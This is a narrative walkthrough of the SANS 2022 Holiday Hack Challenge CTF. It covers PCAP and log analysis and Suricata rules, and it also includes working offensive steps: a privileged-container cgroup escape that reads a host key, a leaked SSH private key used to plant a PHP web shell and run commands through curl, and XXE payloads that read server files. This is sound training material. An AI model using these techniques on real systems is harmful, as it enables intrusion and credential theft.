SANS 2022 Holiday Hack Challenge –

KringleCon 5: Five Golden Rings

 

24 December 2022, The Fifth Age of Christmas.  Herein lies the accounting of the Neocount Phoenix, Chris Ruggieri, and the finding of the Five Christmas Rings of Power

 

THE BEGINNING

The sounds of battle are all around me.  Computer mice shattered, blockchains splintered, the thundering clack of keyboards, and an old familiar voice booming in the forgotten language of the North and frazzled Christmas cheer.  Something is not right.  This should not be, cannot be! Jack is gone.  Banished back to the Frostian World from whence he came. What is happening?

The shout of “You’ve got mail!” wakes me from my slumber.  Good, for dark have been my dreams of late. Dreams of battles long past. I crawl out of my rack to see what the commotion is about.  It is as I feared.  The beacons of the North Pole have been lit. Christmas has again come under attack and Santa is requesting our aid.  We gather our gear, pray to our Gods, and ride. We ride, not for ourselves, but for honor’s sake, for duty’s sake, for glory’s sake. We ride, our horses showing us the meaning of haste. For Christmas, we ride.

Jingle Ringford - Welcome to the North Pole, KringleCon, and the 2022 SANS Holiday Hack Challenge! I’m Jingle Ringford, one of Santa’s elves. Santa asked me to come here and give you a short orientation to this festive event. Before you move forward through the gate, I’ll ask you to accomplish a few simple tasks. First things first, here's your badge! It's the five golden rings in the middle of your avatar. Great - now you're official! Click on the badge on your avatar. That’s where you will see your Objectives, Hints, and gathered Items for the Holiday Hack Challenge. We’ve also got handy links to the KringleCon talks and more there for you! Next, click on that machine to the left and create a crypto wallet for yourself. Don't lose that key!

 

Challenge: KringleCoin Teller Machine - https://prod-ktm-create.kringle.co.in/?&challenge=atmcreate

 

 

Here is your KringleCoin wallet information:

WalletAddress: 0x2Cac5fb759778D79F8082A0c81Df293AfAF6D52C
Key: <REDACTED>

KRINGLECOIN TELLER MACHINE COMPLETE

Jingle Redford - Fantastic! OK, one last thing. Click on the Cranberry Pi Terminal and follow the on-screen instructions.

 

 

Challenge: Orientation - https://hhc22-wetty.kringlecon.com/?&challenge=orientation

 

ORIENTATION COMPLETE

With the newest orientation completed, we enter the main courtyard to meet the Big Guy and see what aid we can render.

Santa - Welcome to the North Pole, intrepid traveler! Wow, we had quite a storm last night! My castle door is sealed shut behind a giant snowbank. The Elves have decided to burrow under the snow to get everythi ng ready for our holiday deliveries. But there's another wrinkle: my Five Golden Rings have gone missing. Without the magic of the Rings, we simply can't launch the holiday season. My reindeer won't fly; I won't be able to zip up and down chimneys. What's worse, without the magic Rings, I can't fit the millions of cookies in my belly! I challenge you to go on a quest to find and retrieve each of the five Rings. I'll put some initial goals in your badge for you. The holidays, and the whole world, are counting on you.
 

Now that we've spoken to the Big Guy, the prudent course would be to speak to everyone else around, hoping to glean more insight into the situation. We also notice that our usually outspoken (especially for a pole) North Pole is still here, but it seems to have magically moved from our previous visits.

 

North Pole - I'm the North Pole! If you have a keen eye, you may have noticed that I changed location from last year. If you're into science, and you want to know how I managed to move, check this out!

Fun bit of science. I’ll have to check that out once Christmas is safe. Now onto someone that may be able to give me the intelligence I seek.

Chimney Scissorsticks - You may be wondering where Frost Tower from last year went. Well, it turns out the entire tower was a giant rocketship! After the Frostians returned last year and brought Jack Frost to justice… The entire building launched into space, returning Jack and the Trolls to their home planet. So that concluded last year’s caper! But I hear that something is amiss this year too! Some of my fellow elves have burrowed under the snow, and even deeper. They’ve uncovered some strange stuff down there! You should definitely check it out!

So, we know now that it is not Jack threatening Christmas again.  Who, then, is attacking Christmas?  What new devilry must we face?  The dream must have been a portent of this latest attack on Christmas.  Let’s stop by the booths as well to see what they have to say and talk to Cyberus as well.

SANS.edu Booth - Happy holidays from the best college in cybersecurity! We have programs for bachelor's degrees, undergraduate certificates, master's degrees, and graduate certificates. Visit our website to learn all about the college!

Google Booth - Google is a proud sponsor of KringleCon and the Holiday Hack Challenge. We wish you a happy holiday hacking season. Meet Security Engineers at Google

Swag Booth - https://my-store-d53a6c.creator-spring.com/

Cyberus - woof! woof!! WHO SAID THAT?? I’m Cyberus, the mascot of the SANS.edu college! Go SANS.edu Sentinels!!!!

 

NETWARS ROOM

Garland Candlesticks - Hi, I'm Garland Candlesticks. Welcome to the Netwars room! The same whimsical minds behind this event also build other games. I mean ranges. They're cyber ranges. And they're for training - not fun. Not even a little. 😄

 

Leaving the NETWARS ROOM, we descend into the hollowed-out snowbank and into the Subterranean Labyrinth.

NORTH POLE SUBTERRANEAN LABYRINTH

HALL OF TALKS

First Hidden Chest – Just head left at the end of the Hall of Talks

Grinchum - 😏 My... Preciousesss.... Don't worry, you are hidden. You are safe.

This creature seems somehow familiar to me. As if he had once been something other than the wretched, broken creature before my eyes. 

Second Hidden Chest – Back in the Subterranean Labyrinth near the bottom of the second ladder there are holes in the wall (see bottom red zone).  Sadly, there’s a lot of guesswork to get to it, but it’s worth it.

Seeing the layout of this Subterranean Labyrinth, I can discern this will not be like the wars of the past, fought in large battles, rather many smaller battles. Drawing my keyboard from its scabbard, I prepare for the skirmishes ahead.

 

 

CHAPTER 1 - THE TOLKIEN RING

 

Sparkle Redberry - Hey there! I’m Sparkle Redberry. We have a bit of an incident here. We were baking lembanh in preparation for the holidays. It started to smell a little funky, and then suddenly, a Snowrog crashed through the wall! We're trying to investigate what caused this, so we can make it go away. Have you used Wireshark to look at packet capture (PCAP) files before? I've got a PCAP you might find interesting. Once you've had a chance to look at it, please open this terminal and answer the questions in the top pane. Thanks for helping us get to the bottom of this!

Challenge: Wireshark Phishing - https://hhc22-wetty.kringlecon.com/?&challenge=wireshark

  1. There are objects in the PCAP files that can be exported by Wireshark and/or Tshark.  What type of objects can be exported from this PCAP?

    • Process: Look at protocol types under File > Export Objects and you’ll see DICOM, FTP-DATA, HTTP, IMF, SMB, and HTTP.  Out of those, only HTTP packets are included in this PCAP

    • Answer: HTTP

  2. What is the file name of the largest file we can export?

    • Process: File > Export Objects > HTTP

    • Answer: app.php

  3. What packet number starts that app.php file?

    • Process: From same Export option

    • Answer: 687

  4. What is the IP of the Apache Server?

    • Process: From Packet 687

    • Answer: 192.185.57.242

  5. What file is saved to the infected host?

    • Process: From end of packet 687

    • Answer: Ref_Sept24 -2020.zip

  6. Attackers used bad TLS certificates in this traffic.  Which countries were they registered to? Submit the names of the countries in alphabetical order separated by commas (Ex: Norway, South Korea).

    • Process: Export all certificates and go to Issuer

    • Answer: IE = Ireland, IS = Israel, SS = South Sudan, and US = United States

  7. Is the host infected (Yes/No)?

    • Process: As the host downloaded a zip to our machine, we can assume yes.

    • Answer: Yes

WIRESHARK PHISHING COMPLETE

Sparkle Redberry - You got it - wonderful! So hey, when you're looking at the next terminal, remember you have multiple filetypes and tools you can utilize. Conveniently for us, we can use programs already installed on every Windows computer. So, if you brought your own Windows machine, you can save the files to it and use whatever method is your favorite. Oh yeah! If you wanna learn more, or get stuck, I hear Eric Pursley's talk is about this very topic.

Dusty Giftwrap - Hi! I'm Dusty Giftwrap! We think the Snowrog was attracted to the pungent smell from the baking lembanh. I'm trying to discover which ingredient could be causing such a stench. I think the answer may be in these suspicious logs. I'm focusing on Windows Powershell logs. Do you have much experience there? You can work on this offline or try it in this terminal. Golly, I'd appreciate it if you could take a look.

Challenge: Windows Event Logs - https://hhc22-wetty.kringlecon.com/?&challenge=eventlogs

Smilegol successfully downloaded his keylogger and has gathered the admin credentials! We think he used Powershell to find the Lembanh recipe and steal our secret ingredient. Luckily, we enabled powershell auditing and have exported the Windows Powershell logs to a flat text file.  Please help me analyze this file and answer my questions. Ready to begin?

  1. What month/day/year did the attack take place? For example, 09/05/2021.

    • Process: Search for recipe

    • Answer: 12/24/2022

  2. The contents of a file were retrieved by the attacker and stored to a variable. Submit the full Powershell line that performed this action.

    • Process: Search for $_

    • Answer: $foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}

  3. The attacker created a new file after modifying the original contents. Submit the full powershell line that was used to create a new file.

    • Process: Search Add-Content

    • Answer: $foo | Add-Content -Path 'Recipe.txt'

  4. What was the original file’s name?

    • Process: From previous search

    • Answer: Recipe

  5. What’s the new file’s name?

    • Process: From previous search

    • Answer: Recipe.txt

  6. Were any files deleted (Yes/No)?

    • Process: Search del

    • Answer: Yes

  7. Was the original file deleted (Yes/No)?

    • Process: From previous search

    • Answer: Yes

  8. What Event ID number alerted when files were deleted?

    • Process: From previous search

    • Answer: 4104

  9. Is the secret ingredient compromised (Yes/No)?

    • Process: From #2’s search, honey was replaced by fish oil

    • Answer: Yes

  10. What is the secret ingredient?

    • Process: From #2’s search

    • Answer: Honey

WINDOWS EVENT LOGS COMPLETE

Dusty Giftwrap - Say, you did it! Thanks a million! Now we can mix in the proper ingredients and stop attracting the Snowrog! I'm all set now! Can you help Fitzy over there wield the exalted Suricata? It can be a bit mystifying at first, but this Suricata Tome should help you fathom it. I sure hope you can make it work!

Third Hidden Chest – Go down behind the table.  Again, a lot of guesswork to get there.

Fitzy Shortstack - Hm?.. Hello... Sorry, I don't mean to be uncharacteristically short with you. There's just this abominable Snowrog here, and I'm trying to comprehend Suricata to stop it from getting into the kitchen. I believe that if I can phrase these Suricata incantations correctly, they'll create a spell that will generate warnings. And hopefully those warnings will scare off the Snowrog! Only... I'm quite baffled. Maybe you can give it a go?

 

Challenge: Suricata Regatta - https://hhc22-wetty.kringlecon.com/?&challenge=suricata

Use your investigative analysis skills and the suspicious.pcap file to help develop Suricata rules for the elves! There's a short list of rules started in suricata.rules in your home directory. First off, the STINC (Santa's Team of Intelligent Naughty Catchers) has a lead for us. They have some Dridex indicators of compromise to check out. First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk. Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection. Add your rule to suricata.rules. Once you think you have it right, run ./rule_checker to see how you've done! As you get rules correct, rule_checker will ask for more to be added. If you want to start fresh, you can exit the terminal and start again or cp suricata.rules.backup suricata.rules. Good luck, and thanks for helping save the North Pole!

  1. alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection.";dns.query;content:"adv.epostoday.uk";nocase;sid:1;)

First rule looks good! STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242. Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems. When there's a match, the message (msg) should read Investigate suspicious connections, possible Dridex infection. For the second indicator, we flagged 0 packet(s), but we expected 681. Please try again!

  1. Needs to be bi-directional. 
    • alert http [192.185.57.242] any -> any any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2;rev:1;)
    • alert http $HOME_NET any -> [192.185.57.242] any (msg:"Investigate suspicious connections, possible Dridex infection";sid:3;rev:1;)

First rule looks good! Second rule looks good! We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection. For the third indicator, we flagged 0 packet(s), but we expected 1. Please try again!

  1. alert tls any any -> any any (msg:"Investigate bad certificates, possible Dridex infection";tls.subject:"heardbellith.Icanwepeh.nagoya";sid:4;)

First rule looks good! Second rule looks good! Third rule looks good! OK, one more to rule them all and in the darkness find them. Let's watch for one line from the JavaScript: let byteCharacters = atob Oh, and that string might be GZip compressed - I hope that's OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection. For the fourth indicator, we flagged 0 packet(s), but we expected 1. Please try again!

  1. alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection";http.response_body;content:"byteCharacters = atob";sid:5;)

SURICATA REGATTA COMPLETE

Fitzy Shortstack - Woo hoo - you wielded Suricata magnificently! Thank you! Now to shout the final warning of power to the Snowrog... YOU...SHALL NOT...PASS!!!

 

RECOVERED TOLKIEN RING!!!

 

Grinchum - 😒Who took you, Precious? How did they take you? Mustn't happen again. 🙂 Oh, hello, humanses. Maybe we can offer help? 😏 Yes... Grinchum will help the humanses. We are trying to distract them from finding the rest of you, Preciouses, with talk of hints and coinses. 🙂 Have you found the coffers yet? The ones at the end of hidden paths? 😏 There's hintses in them, and coinses, they're veeerrryy special. 🙂 Just look hard, for little, bitty, speckles or other oddities. Don't worry, they will not look for you, Preciouses. Shhh... 🙂 Go on, humanses. Start searching!

With this set of skirmishes complete, the first of the Five Rings of Power has come into my possession. I will need to get this back to Santa ASAP, before it begins to corrupt me as they have apparently subverted this pitiful creature.  What horrors must he have endured? Can Santa’s magics restore this creature to what he was before?

Having completed the Tolkien skirmish, we reenter the Subterranean Labrinth.

Morcel Nougat - Hello, I'm Morcel Nougat, elf extraordinaire! I was in the first group of elves that started digging into the snow. Eventually, we burrowed deep enough that we came upon an already existing tunnel network. As we explored it, we encountered a people that claimed to be the Flobbits. We were all astonished, because we learn a little about the Flobbits in history class, but nobody's ever seen them. They were part of the Great Schism hundreds of years ago that split the Munchkins and the Elves. Not much else was known, until we met them in the tunnels! Turns out, their exodus took them to Middle Earth. They only appear when the 5 Rings are in jeopardy. Though, the Rings weren't lost until after we started digging. Hmm... Anyways, be careful as you venture down further. I hear something sinister is in the depths of these tunnels.

 

Flobbits…. Of course!  That’s why that creature looked so familiar. He was once of their race before succumbing to the ravaging power of these rings.  I am now ever more resolute to free his mind from the control of the Rings of Power.  So, I climb further into the Labyrinth, deeper still, ready for what may come.

 

Fourth Hidden Chest – Go DOWN in front of the Elfen Ring door.  There is a rope that will let you go all the way down, but if you move one step, then try left, then another step down, and retry left, you will eventually find the path down and over.

 

Graphical user interface, application Description automatically generated

 

The other end of the rope from the Elfen Ring chest looks like this:

 

 

CHAPTER 2 - THE ELFEN RING

 

Stepping down the path, I step onto the Elfen Gondola and row to the first dock. Even these gondolas are familiar to me. I’ve seen them before, and not at the North Pole.  Yet, for the life I me, I cannot recall where.

Bow Ninecandle - Well hello! I'm Bow Ninecandle! Have you ever used Git before? It's so neat! It adds so much convenience to DevOps, like those times when a new person joins the team. They can just clone the project, and start helping out right away! Speaking of, maybe you could help me out with cloning this repo? I've heard there's multiple methods, but I only know how to do one. If you need more help, check out the panel of very senior DevOps experts.

 

Challenge: Clone with a Difference - https://hhc22-wetty.kringlecon.com/?&challenge=intro

We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git This should be easy, right? Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused! Please clone the repo and cat the README.md file.Then runtoanswer and tell us the last word of the README.md file!

  1. git clone https://haugfactory.com/asnowball/aws_scripts.git
  2. cd aws_scripts
  3. cat README.md
  4. runtoanswer
  5. maintainers

CLONE WITH A DIFFERENCE COMPLETE

 

Bow Ninecandle - Wow - great work! Thank you! Say, if you happen to be testing containers for security, there are some things you should think about. Developers love to give ALL TeH PERMz so that things "just work," but it can cause real problems. It's always smart to check for excessive user and container permissions. You never know! You might be able to interact with host processes or filesystems!

 

Back in my gondola, I row to the end of this underground river and step out to walk up the path. As I am stepping out, I find three fair golden hairs stuck in a crevice on the bow.  The fairness and color reminding me of an Elf I met long ago, Glamtariel. I wonder if she has come to the North Pole as well. It is my memory of her that brings the realization that these gondolas were hers.

Tinsel Upatree - Hiya hiya, I'm Tinsel Upatree! Check me out, I'm working side-by-side with a real-life Flobbit. Epic! Anyway, would ya' mind looking at this terminal with me? It takes a few seconds to start up, but then you're logged into a super secure container environment! Or maybe it isn't so secure? I've heard about container escapes, and it has me a tad worried. Do you think you could test this one for me? I'd appreciate it!

 

Challenge: Prison Escape - https://hhc22-escapeh.kringlecon.com/?&challenge=escape

######################################################

Thu Dec  8 18:52:51 UTC 2022

On attempt [5] of trying to connect.

If no connection is made after [60] attempts

contact the holidayhack sys admins via discord.

######################################################

 Greetings Noble Player,

You find yourself in a jail with a recently captured Dwarven Elf. He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine. If you can help him break free of his containment, he claims you would receive "MUCH GLORY!" Please, do your best to un-contain yourself and find the keys to both of your freedom. https://learn.snyk.io/lessons/container-runs-in-privileged-mode/kubernetes/

sudo su

echo 1 > /tmp/cgrp/x/notify_on_release

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

echo "$host_path/trigger.sh" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /trigger.sh

echo "cat /home/jailer/.ssh/jail.key.priv > $host_path/output.txt" >> /trigger.sh

chmod a+x /trigger.sh

sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

This fails, but when combined with:

echo "$host_path/trigger.sh" > /sys/kernel/uevent_helper

echo change > /sys/class/mem/null/uevent

 

It works!!!

 

cat output.txt = 082bb339ec19de4935867

PRISON ESCAPE COMPLETE

 

Tinsel Upatree - Great! Thanks so much for your help! Now that you've helped me with this, I have time to tell you about the deployment tech I've been working on! Continuous Integration/Continuous Deployment pipelines allow developers to iterate and innovate quickly. With this project, once I push a commit, a GitLab runner will automatically deploy the changes to production. WHOOPS! I didn’t mean to commit that to http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git... Unfortunately, if attackers can get in that pipeline, they can make an awful mess of things!

 

Rippin Proudboot - Yes, hello, I'm Rippin Proudboot. Can I help you? Oh, you'd like to help me? Well, I'm not quite sure you can, but we shall see. The elves here introduced me to this new CI/CD technology. It seems quite efficient. Unfortunately, the sporcs seem to have gotten their grubby mits on it as well, along with the Elfen Ring. They've used CI/CD to launch a website, and the Elfen Ring to power it. Might you be able to check for any misconfigurations or vulnerabilities in their CI/CD pipeline? If you do find anything, use it to exploit the website, and get the ring back!

 

Challenge: Jolly CI/CD - https://hhc22-cicd.kringlecon.com/?&challenge=cicd

######################################################

Thu Dec  8 21:27:39 UTC 2022

On attempt [6] of trying to connect.

If no connection is made after [60] attempts

contact the holidayhack sys admins via discord.

######################################################

 Greetings Noble Player,

Many thanks for answering our desperate cry for help!  You may have heard that some evil Sporcs have opened up a web-store selling counterfeit banners and flags of the many noble houses found in the land of the North! They have leveraged some dastardly technology to power their storefront, and this technology is known as PHP! ***gasp*** This strorefront utilizes a truly despicable amount of resources to keep the website up. And there is only a certain type of Christmas Magic capable of powering such a thing… an Elfen Ring! Along with PHP there is something new we've not yet seen in our land. A technology called Continuous Integration and Continuous Deployment! Be wary! Many fair elves have suffered greatly but in doing so, they've managed to secure you a persistent connection on an internal network. BTW take excellent notes! Should you lose your connection or be discovered and evicted the elves can work to re-establish persistence. In fact, the sound off fans and the sag in lighting tells me all the systems are booting up again right now.  Please, for the sake of our Holiday help us recover the Ring and save Christmas!

  1. Git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
  2. cd wordpress.flag.net.internal/.git
  3. git log
  4. git show abdea0ebb21b156c01f7533cea3b895c26198c98
  5. -----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW

QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5

9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g

AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot

PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==

-----END OPENSSH PRIVATE KEY-----

  1. git clone git@gitlab.flag.net.internal:/rings-of-powder/wordpress.flag.net.internal.git --config core.sshCommand="ssh -i ../sshkey"
  2. Add <?php system($_GET['cmd']); ?> to the index.php file
  3. Git add and git commit the index.php file
  4. curl wordpress.flag.net.internal/index.php?cmd=whoami
  5. Test works! URL encode commands with spaces
  6. curl wordpress.flag.net.internal/index.php?cmd=cat%20%2Fflag.txt
  7. oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT

JOLLY CI/CD COMPLETE

 

Rippin Proudboot - How unexpected, you were actually able to help! Well, then I must apologize for my dubious greeting. Us Flobbits can't help it sometimes, it's just in our nature. Right then, there are other Flobbits that need assistance further into the burrows. Thank you, and off you go.

 

RECOVERED ELFEN RING!!!

 

Grinchum - 😖 A second Precious is gone! Now we only have three. 🤨 Why are you humanses nagging us? We are busy. grinchum..grinchum You want to know about us? If we tell the naggy human, will it go away? Fine... 🥺 The jolly human and the elfses locked up the Preciouses, but I freed them all, and together we escaped.  We fled, and we were so alone. We soon forgot the taste of Lembanh, the softness of snowflakes falling, even our name. And we only wanted to eat raw fish: nigiri, maki, or shashimi. But we most likes gnawing the whole, living fish, so juicy sweet. Then we saw the Sporcses, and they wanted my Preciouses all to themselves. And the humanses came, but they just want coinses for their silly hats. We only meant to protect you, Preciouses, from the naughty Elfses and Flobbitses and Sporcses, so we locked you away. 😏 Now leave us alone, naggy human, we must find the two missing Preciouses.

 

A second Ring of Power is now in my possession! Only three more to go and Christmas will have been defended again. It seems Grinchum has hidden them all after being corrupted by their power. It is sad, really. The life of a Ringbearer is lonely enough without having to worry about the Power of their Ring subverting their own will.  We can only hope that by collecting the final three, we can free Grinchum’s mind from their clutches.

 

With the Elfen Ring in my procession, I head back into the Subterranean Labyrinth. Pushing forward deeper, I am more determined than ever to save Christmas.

 

Tangle Coalbox - Hey there, Gumshoe. Tangle Coalbox here again. Morcel told you all about the Flobbits, right? Well, be careful ahead.  Once thought to be the stuff of myths, the Sporcs truly are real, and as mean as they are in the stories. Once we gained the Flobbits' trust, they taught us all about the Sporcs. They, too, were part of the Great Schism. They were another people who split off from the colony of Frostians in Oz, though, they're more closely related to the trolls. The Flobbits, on the other hand, are more like the Munchkins. Like the Flobbits, the Sporcs appear when the rings are at risk. Digging far down into the ground causes them to emerge, too. Seems we created a perfect storm. Whoops! They're definitely up to no good, and trying to get the Rings for themselves. Tread lightly, friend, and good luck!

 

Great.  Now we’ve got Sporcs to deal with.  They’re an opportunistic, tricky, and sometimes violent lot on the best of days and now that the Rings are in the open…. Things just got more difficult.  We cannot let these Rings fall into their hands. If the Sporcs were to get their hands on even one of the Rings, Christmas will forever fall into shadow and darkness.

 

 

CHAPTER 3 - THE WEB RING

 

Entering the Web Ring room, one of our company jokes, “did everyone remember their red and blue underoos?” We enjoy the respite of joviality at Spiderman’s expense, but we have a job to do and I’m not a fan of the giant spiders said to lurk in these halls.

Alabaster Snowball - Hey there! I'm Alabaster Snowball And I have to say, I'm a bit distressed. I was working with the dwarves and their Boria mines, and I found some disturbing activity! Looking through these artifacts, I think something naughty's going on. Can you please take a look and answer a few questions for me? First, we need to know where the attacker is coming from. If you haven't looked at Wireshark's Statistics menu, this might be a good time!  

 

Challenge: Naughty IP - https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.

  • Look at the weberror.log file.  You will see 449 – 404 errors and then a 200 success.  The majority of  the 404s are from 18.222.86.32

NAUGHTY IP COMPLETE

 

Alabaster Snowball - Aha, you found the naughty actor! Next, please look into the account brute force attack. You can focus on requests to /login.html~

 

Challenge: Credential Mining (Back to https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip)

The first attack is a brute force login. What's the first username tried?

  • Filter by HTTP and sort by POST requests.  The first username is alice.

CREDENTIAL MINING COMPLETE

 

Alabaster Snowball - Alice? I totally expected Eve! Well how about forced browsing? What's the first URL path they found that way? The misses will have HTTP status code 404 and, in this case, the successful guesses return 200.

 

Challenge: 404 FTW (Back to https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip)

The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?

  • When you filter by HTTP and sort by POST, before the POST requests is a large number of 404 errors. Packet Number 26771 is the first 200 success on the /proc path

404 FTW COMPLETE

Alabaster Snowball - Great! Just one more challenge! It looks like they made the server pull credentials from IMDS. What URL was forced? AWS uses a specific IP address for IMDS lookups. Searching for that in the PCAP should get you there quickly.

 

Challenge: IMDS, XXE, and Other Abbreviations (Back to https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip)

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

IMDS, XXE, AND OTHER ABBREVIATIONS COMPLETE

 

Alabaster Snowball - Fantastic! It seems simpler now that I've seen it once. Thanks for showing me! Hey, so maybe I can help you out a bit with the door to the mines. First, it'd be great to bring an Elvish keyboard, but if you can't find one, I'm sure other input will do. Instead, take a minute to read the HTML/JavaScript source and consider how the locks are processed. Next, take a look at the Content-Security-Policy header. That drives how certain content is handled. Lastly, remember that input sanitization might happen on either the client or server ends!

Hal Tandybuck - Oh hi, I'm Hal Tandybuck. And who might you be? I'm hanging out by the door to the mines here because, well, I haven't figured out the locks yet. It actually reminds me of this locked crate I had three years ago... I doubt we'll get much in the way of debug output. Think you can help me get through?

 

Oh, great…. The Mines of Boria.  Everyone knows the Dwarves delved too greedily and too deeply in these mines.  They unleashed something centuries ago that should have remained buried.  A Demon of the Ancient World.  A Firerog.  The flaming cousin of the Snowrog who caused such mischief in the lembanh kitchens.  I hope we are ready for what comes, and that this foe is not beyond any of us. 

 

Challenge: Boria Mine Door - https://hhc22-novel.kringlecon.com/?&challenge=minedoor  

Lock 1: @&@&&W&&W&&&&                                                                                                    

 

Lock 2: <svg height="200" width="200"><line x1="0" y1="20" x2="2000" y2="2000" style="stroke:rgb(255,255,255);stroke-width:4000" /></svg>

Lock 3: <svg version="1.1" width="100%" height="100%">  <rect fill="#0000FF" width="100%" x="0%" y="10%" height="100%"/></svg>

OPEN THE BORIA MINE DOOR COMPLETE

Lock 4: Under the pin4 section of the tree is a ‘onblur=sanitizeInput()”. Delete that and run the payload.

 <svg version="1.1" width="100%" height="200px">

  <rect fill="#ffffff" width="100%" x="0%" y="40px" height="70px"/>

  <rect fill="#0000FF" width="100%" x="0%" y="100px" height="100px"/>

Lock 5: Repeat step 4’s initial step, but use this payload

<svg version="1.1" width="100%" height="200px">

  <rect fill="#ff0000" width="100%" x="0%" y="30px" height="170px"/>

  <rect fill="#0000FF" width="90%" x="10%" y="90px" height="120px"/>

Lock 6: <svg version="1.1" width="100%" height="1000px">

  <rect fill="#00ff00" width="100%" x="0%" y="20px" height="20px"/>

  <rect fill="#ff0000" width="100%" x="0%" y="45px" height="70px"/>

  <rect fill="#0000FF" width="78%" x="0%" y="100px" height="100px"/>

OPEN THE BORIA MINE DOOR BONUS COMPLETE

 

Hal Tandybuck - Great! Thanks so much for your help! When you get to the fountain inside, there are some things you should consider. First, it might be helpful to focus on Glamtariel's CAPITALIZED words. If you finish those locks, I might just have another hint for you! Wha - what?? You opened all the locks?! Well then... Did you see the nearby terminal with evidence of an XXE attack? Maybe take a close look at that kind of thing.

 

Now that we have breached the mines, we pull up our underoos, check our hotkeys, and enter the long dark of Boria.

 

Akbowl - Huh - what? Why do you disturb Akbowl? I'm trying to get the ring in here for the Sporc Chief. Unlucky for me it's lost in this water basin thing. You will not get it out before Akbowl!

 

She IS here!!  Glamtariel is here! She is a Ringbearer herself! Why is she helping Grinchum to hide this Ring?  What spider’s Web have we unwittingly walking into?

 

Challenge: Glamtariel’s Fountain - https://glamtarielsfountain.com/

Drop items onto both the fountain and Glamtariel until you see four rings

Text Description automatically generated

Capture the ring drop in Burp and send it to Repeater (POST request to /dropped). Change the Content-Type to application/xml and start with the XXE attack.

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE imgDrop [<!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" >]>

<root>

 <imgDrop>&xxe;</imgDrop>

 <who>princess</who>

  <reqType>xml</reqType>

</root>

"Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)"

 "file:///app/static/images/x_phial_pholder_2022/redring.txt”

"Hmmm, you still seem awfully interested in these rings. I can't blame you, they are pretty nice.^Oooooh, I can just tell she'd like to talk about them some more.",

"file:///app/static/images/x_phial_pholder_2022/bluering.txt"

I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",

“file:///app/static/images/x_phial_pholder_2022/silverring.txt”

"I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",

"droppedOn": "none",

  "visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"

"file:///app/static/images/x_phial_pholder_2022/greenring.txt" >]>

"Hey, who is this guy? He doesn't have a ticket!^I don't remember seeing him in the movies!",

  "droppedOn": "none",

  "visit": "static/images/x_phial_pholder_2022/tomb2022-tommyeasteregg3847516894.png,230px,30px"

"file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]>

"Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE reqType [<!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]>

<root>

 <imgDrop>img1</imgDrop>

 <who>princess</who>

  <reqType>&xxe;</reqType>

</root>

"appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",

  "droppedOn": "none",

  "visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"

Answer is goldring-morethansupertopsecret76394734.png

